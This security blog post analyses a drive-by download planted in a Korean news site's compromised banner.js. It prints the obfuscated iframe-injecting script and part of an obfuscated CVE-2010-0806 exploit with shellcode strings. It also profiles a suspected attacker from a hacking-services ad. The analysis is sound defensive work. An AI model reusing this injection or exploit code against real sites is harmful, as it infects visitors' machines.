Malvertising or drive-by web malware attack?

Recently we've been thinking about how to generate some statistics for malvertising.

Sometimes it's tricky, because nowadays more and more drive-by downloads try to hide themselves by disguising as coming from ad servers.

Here's an example. Recently our scanners reported that, a Korean news website ranking 671 in Korea, was serving live drive-by downloads.

Well, it indeed is, as we write.

In its index page, contains the following javascript, which displays ad banners:

<script type="text/javascript" src="/js/banner.js"></script>

/js/banner.js was compromised and the following malicious script was inserted at the end of the file:

if(document.cookie.indexOf('xxoo')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='xxoo=Yes;path=/;expires='+expires.toGMTString;document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%64%2E%69%6C%69%6B%65%63%31%69%63%6B%2E%63%6F%6D%2F%61%64%2E%61%73%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E"));}

Which, after decoding,writes the following:

<iframe src="" width=0 height=0></iframe>

This "" domain apparently tries to resemble "", which is a Korean ad network: contains the javascript exploit:

document.write("<bu"+"tton i"+"d='mon' o"+"ncl"+"ick"+"='sc"+"lick();' S"+"TYLE='DISP"+"LAY"+":NONE'></b"+"utton>");
var eLFGhbswV="%x9090%";var ZyOWqionK="x9090%x5858%x5858%x10EB%x4B5B";var LoLYVDGGQ="%xC933%xB966%x03B8%x3480";var cXbQEhvHS="%xBD0B%xFAE2%x05EB%xEBE8%";var UpiNKTfoo="xFFFF";var GIMIByGgI="%x54FF%xBEA3%xBDBD%xD9E2";var xsBZzgBPo="%x8D1C%";var lXOdHiLAV="xBDBD";var ZzEEOlPoD="%x36BD%xB1FD%xCD36%x1";var SbYhcedXP="0A1%xD53";var xngsAiUQI="6%x36B5%xD74A%xE4A";var KGhCigcMg="C%x0355%xBDBF%x";var iWWZubmWc="2DBD%x455F%x8ED5%x";var pefyOgmGu="BD8F%xD5BD%xCEE8%xCF";var kEqSfhtbi="D8%x36E9%xB1FB%x0";var AObPGCHfF="355%xBDBC%x36BD%xD755%xE4B";var

This is an iepeers (CVE-2010-0806) exploit; after successful exploitation, the browser downloads and executes

The exploit, ad.asp, triggers 7/32 on VirusTotal, and the malware, pds.exe, triggers 27/42.

OK, and so, is this a drive-by download attack, or a malvertising attack?

Very similar to the previous "" malvertising incident, this incident also involves a malicious domain "" which resembles "".

So should this be categorized as a malvertising incident? I would say no. I don't think the attacker registered and then tricked to take on his ad. I think in this case, he simply hacked into and modified their banner.js file. However, in order to prolong the lifespan of this drive-by download operation, he's registered his malicious domain to resemble an ad network, hoping that this would reduce the chance of someone noticing something funny.

This is one of the challenges we currently face at generating malvertising statistics. Although malvertising, mass sql injections, mass hosting compromises, mass wordpress injections, and individual hacks such as this case, all often end up serving drive-by downloads (Web malware), the threats should be categorized differently from a "point of entry" standpoint. However, doing so requires quite some manual labor.


PS: Last time we were able to identify the individual behind the "" malvertising attack. Well, how about for this example? We attempted a try.

The domain was registered on Jan 19th by "". This fellow posted an ad (in Chinese) last month:

接单(拿SHELL 数据库 等等)

地区:韩国 台湾 美国 等等(除国内)
要求:只接3000以上的单子 小单勿扰
找长期合作伙伴 无需定金,拿到后验证过付钱.
联系方式GT [email][/email] QQ:9 9 8 3 8 0 8

I'll translate it:
Hope to acquire projects (get shell, database, etc)
Region: Korea, Taiwan, US, etc, but no domestic targets (mainland China)
Scope of work: all types of databases, webshell, pentesting
Requirement: Fees start at no less than 450USD / project

Looking for long-term partnerships, no up-front payment required, pay after you get what you want.

And then there's his email and QQ. From his QQ, he's a 25-year-old male nicknamed "All night prince," and based out of China. I think he's based out of Guangdong because most of the websites that he operate, for example, and, are all located in Guangdong.

The "services" that he offers matches with our speculation--that he broke into and injected the drive-by iframe.

Read more (rest of article)...